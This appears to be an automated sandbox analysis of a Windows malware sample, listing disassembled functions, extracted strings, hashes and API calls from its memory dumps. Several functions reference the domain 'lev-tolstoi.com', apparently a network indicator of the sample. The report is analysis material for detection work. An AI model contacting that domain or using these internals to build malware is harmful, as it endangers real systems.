Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46

Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
&=, xrefs: 0042CA18
0, xrefs: 0042C8BB
EF, xrefs: 0042CB6A
D@6T, xrefs: 0042CA02
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757

Function 009DC8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

D@6T, xrefs: 009DCC69
5, xrefs: 009DCB84
&=, xrefs: 009DCC7F
zJyL, xrefs: 009DCDB0
EF, xrefs: 009DCDD1
0, xrefs: 009DCB22

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: 1c1b5814d6c9b949982561822372424e87dca1f0b4fee31e073dd29dfe10b8c9
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: A3B1E87014C3828AD325CF2984917BBFBD6AFD2314F18CA6ED4D987391DB788549DB12

Function 009B89F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 009B8A1B
GetCurrentThreadId.KERNEL32 ref: 009B8A25
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 009B8AC2
GetForegroundWindow.USER32 ref: 009B8AD7

Part of subcall function 009BBC37: FreeLibrary.KERNEL32(009B8BD2), ref: 009BBC3D
Part of subcall function 009BBC37: FreeLibrary.KERNEL32 ref: 009BBC5E

ExitProcess.KERNEL32 ref: 009B8BD9

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 3676751680-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: 3ce14cff55a28321950aef80afe4099c3240335c0143e0b5437ac5d8c02047d5
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: 8D419F77F4431807D31CAEB5CC5A3ABF69A9BC8324F09803E6985AB390DDB89C0592C1

Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON

Download Yara Rule

Strings

)*, xrefs: 00423216
r1B, xrefs: 00423169
X9{;, xrefs: 0042330B

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: )*$X9{;$r1B
API String ID: 0-1001561910
Opcode ID: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
Opcode Fuzzy Hash: d1fb90ac78791e94cb888bfb997ed68ee8d3de2ae4c9ad63322004d88f834bfc
Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A

Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON

Download Yara Rule

Strings

C\, xrefs: 0041C1F0
-, xrefs: 0041C167
de, xrefs: 0041C34D
[^, xrefs: 0041C1E8
Iz, xrefs: 0041C15F

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: -$C\$Iz$[^$de
API String ID: 0-3020956940
Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86

Function 009D0817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON

Download Yara Rule

Strings

2g1i, xrefs: 009D08FC
wy, xrefs: 009D08DC
0c=e, xrefs: 009D08F4
&', xrefs: 009D0BCD
<k;m, xrefs: 009D0904

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$wy
API String ID: 0-3335612808
Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction ID: 41131ab07cc2d533fd54a810b53bbd772028198f665012ebcbe8ccec8c876faf
Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
Instruction Fuzzy Hash: 2BD106B56583018BD724DF25C85276BB7F2EFE2314F18DA2DE4828B394E7799801CB52

Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
&=, xrefs: 0042CA18
EF, xrefs: 0042CB6A
D@6T, xrefs: 0042CA02
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757

Function 009DC94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

D@6T, xrefs: 009DCC69
5, xrefs: 009DCB84
&=, xrefs: 009DCC7F
zJyL, xrefs: 009DCDB0
EF, xrefs: 009DCDD1

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: 3cb941ebdf5d01712a82b27c0c8a77c9de62c06cfdb616f0120832ffd89f76f5
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: B2A1F97114C3818BE365CF2984917ABFBD6AFD2304F28CA6ED4D987391DB788449CB12

Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
&=, xrefs: 0042CA18
EF, xrefs: 0042CB6A
D@6T, xrefs: 0042CA02
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757

Function 009DC99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

D@6T, xrefs: 009DCC69
5, xrefs: 009DCB84
&=, xrefs: 009DCC7F
zJyL, xrefs: 009DCDB0
EF, xrefs: 009DCDD1

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: bbaf13ff59e3e0fb85fe68f96b70f8cc935485f7eb21b0e166d063c7367c58cb
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: 01A10A7014C3818FE365CF2984917ABBBD6AFD2304F28CA6ED4D987391DB788449CB12

Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
&=, xrefs: 0042CA18
EF, xrefs: 0042CB6A
D@6T, xrefs: 0042CA02
zJyL, xrefs: 0042CB49

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757

Function 009DC98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

D@6T, xrefs: 009DCC69
5, xrefs: 009DCB84
&=, xrefs: 009DCC7F
zJyL, xrefs: 009DCDB0
EF, xrefs: 009DCDD1

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: 56dd6ce580813873e8a0a2fdc8a5febda3761f0e0ff97c7cbc4066e76ad9285c
Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: A4A1E97114C3818ED325CF2988917ABFBD6AFD2304F28C96ED4D98B391DB748449CB56

Function 009BD25A Relevance: 6.5, Strings: 5, Instructions: 291COMMON

Download Yara Rule

Strings

lev-tolstoi.com, xrefs: 009BD5B1
3ej, xrefs: 009BD544
BI, xrefs: 009BD4BA
pr, xrefs: 009BD558
ZG, xrefs: 009BD4C1

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: BI$ZG$lev-tolstoi.com$3ej$pr
API String ID: 0-2504283770
Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction ID: 322b4bfd33b1c97dfaf90d24ae8dbb7667c30baa6d852f5b0ba51e6d8d7fb018
Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Instruction Fuzzy Hash: DFA1A1B56017818FD728CF29C590A62BBF2FF96314B1995ADC0D68F766D734E802CB50

Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

)R_X, xrefs: 0041E170
zusR, xrefs: 0041E14E
&-, xrefs: 0041E39A
[O_[, xrefs: 0041E2A8

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A

Function 009CE1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

zusR, xrefs: 009CE3B5
[O_[, xrefs: 009CE50F
&-, xrefs: 009CE601
)R_X, xrefs: 009CE3D7

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
Instruction ID: 2cf363c2aca06ca6bb3365a50d1d96aff1b6ab2e13c23a78ef7fcde120e09529
Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
Instruction Fuzzy Hash: 5B42297090C3908FD725DF28C850B6EBBE1AF96314F084A6DE8E65B392D7358906CB53

Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

1, xrefs: 0042BB59
/, xrefs: 0042B908
%(#}, xrefs: 0042B740
/26-, xrefs: 0042B735

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796

Function 009DB75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON

Download Yara Rule

Strings

1, xrefs: 009DBDC0
/, xrefs: 009DBB6F
/26-, xrefs: 009DB99C
%(#}, xrefs: 009DB9A7

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: %(#}$/$/26-$1
API String ID: 0-261129489
Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
Instruction ID: 0ba92cd6278c874d6557001191613a61a3916be5df019d7417c975db0d50ff2e
Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
Instruction Fuzzy Hash: 88E1F57115D3C1CAE725CF29C4617BABBD6EF92304F19896ED0C98B392DB39850AC712

Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON

Download Yara Rule

Strings

?TUV, xrefs: 00418704
D@YO, xrefs: 00418B3E
^QRW, xrefs: 00418B45
"w+y, xrefs: 004185AB

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$D@YO$^QRW
API String ID: 0-2418547040
Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44

Function 00423410 Relevance: 5.4, Strings: 4, Instructions: 415COMMON

Download Yara Rule

Strings

DF, xrefs: 00423452
#$, xrefs: 00423496
?{;}, xrefs: 00423815
+oQ, xrefs: 00423838

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: #$$+oQ$?{;}$DF
API String ID: 0-1090792222
Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86

Function 00431839 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00431887
GetSystemMetrics.USER32 ref: 00431896

Strings

, xrefs: 0043196A

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction ID: 403ffabe11f23b748e06d840ed2f043dd1bcc1ca5a787c04042f92a2a85d24cf
Opcode Fuzzy Hash: 39349761bbbd9d5e5dac84a7f5a9780edeb84eb1621c2c8cfd3bf8aab651dcd4
Instruction Fuzzy Hash: 365173B4E142189FDB40EFACE98569DBBF0BB88310F114529E499E7350D734AD48CF96

Function 009CC1AC Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

[^, xrefs: 009CC44F
C\, xrefs: 009CC457
Iz, xrefs: 009CC3C6
-, xrefs: 009CC3CE

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: -$C\$Iz$[^
API String ID: 0-2105564891
Opcode ID: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
Instruction ID: 392c828f5e22499c29d6412a60d7f56825221925a6f8fc5e9e684e38ca5be184
Opcode Fuzzy Hash: 856b381f3345170c9e1f152739ef8b6d943d9b4d3d608726b0c255f8cc161e2c
Instruction Fuzzy Hash: A081BDB2A4C3509FD308CFA9885195FFBE2EFD5300F59896CF0E98B251D67996068B43

Function 00435EA0 Relevance: 5.3, Strings: 4, Instructions: 253COMMON

Download Yara Rule

Strings

U, xrefs: 00435EB9
T, xrefs: 00435EB4
V, xrefs: 00435EBE
k, xrefs: 00435EAF

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: T$U$V$k
API String ID: 0-1255220828
Opcode ID: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
Instruction ID: 419b7bd8d768cf5a93220c289582c9eeb00d0d40764b4ee896287773b3a375b3
Opcode Fuzzy Hash: 59490c3d0c457f4f9e70ae9389640b911d80fb55b0c1b22c44bb1761b1145410
Instruction Fuzzy Hash: 4CA1043110C7918BD708CB38985022FBBE25BDA324F1A9B2EE4E6473D2D679C945C74B

Function 009E6107 Relevance: 5.3, Strings: 4, Instructions: 253COMMON

Download Yara Rule

Strings

k, xrefs: 009E6116
T, xrefs: 009E611B
U, xrefs: 009E6120
V, xrefs: 009E6125

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: T$U$V$k
API String ID: 0-1255220828
Opcode ID: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
Instruction ID: 86fe8c46bf1cf1d1b4a0d731487902b533839ecc4e671e65af207013bdab3cc6
Opcode Fuzzy Hash: c93e863c5daac2f8ca78168b26a37bbe867cb239aeeaedccae74f18b85e983c0
Instruction Fuzzy Hash: 14A1F43210C3D08BC3169B3A989422EBBD25BE6364F194B2DE5E6873D2D679CD45CB07

Function 0040DD25 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040DD35

Strings

PT, xrefs: 0040DF63
lev-tolstoi.com, xrefs: 0040E06C

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT$lev-tolstoi.com
API String ID: 3861434553-4016702878
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55

Function 009BDF8C Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 320COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 009BDF9C

Strings

lev-tolstoi.com, xrefs: 009BE2D3
PT, xrefs: 009BE1CA

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: PT$lev-tolstoi.com
API String ID: 3861434553-4016702878
Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction ID: 6e6286cbf1d77493b8e307812f350e9f5c4ce13cc3b855dff64862e32909056d
Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
Instruction Fuzzy Hash: EBA1BEB45087818FD726CF29C5A0AA2BFE1EF57310B19869CC4E24FB66D339D805CB15

Function 004156A0 Relevance: 4.4, Strings: 3, Instructions: 617COMMON

Download Yara Rule

Strings

ydij, xrefs: 00415B93
kmbj, xrefs: 00415B8C
in~x, xrefs: 00415AFB

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: in~x$kmbj$ydij
API String ID: 0-2624003027
Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55

Function 004111E5 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

V, xrefs: 004111F3
0, xrefs: 0041160F
e, xrefs: 00411842

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 0$V$e
API String ID: 0-3964817793
Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
